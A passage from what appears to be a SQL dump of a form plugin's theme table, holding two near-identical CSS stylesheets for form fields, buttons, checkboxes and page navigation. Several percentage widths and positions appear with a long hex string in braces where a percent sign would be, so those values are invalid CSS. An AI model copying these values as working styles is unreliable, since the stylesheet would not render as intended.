border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #930049;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #EEEEEE;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #930049;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #930049;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #636363;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8A8A8A;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8A8A8A;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #930049;\r\ncursor: pointer;\r\nbackground-color: #fff;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #930049;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #fff;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(30,'Theme 08 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #070068;\r\nmargin-bottom: 10px;\r\ncolor: #070068;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #070068 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #070068;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #070068;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #070068;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #636363;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8A8A8A;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8A8A8A;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #070068;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #070068;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #fff;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(31,'Theme 09 light gray','.wdform-page-and-images .other_input\r\n{\r\nmax-width: 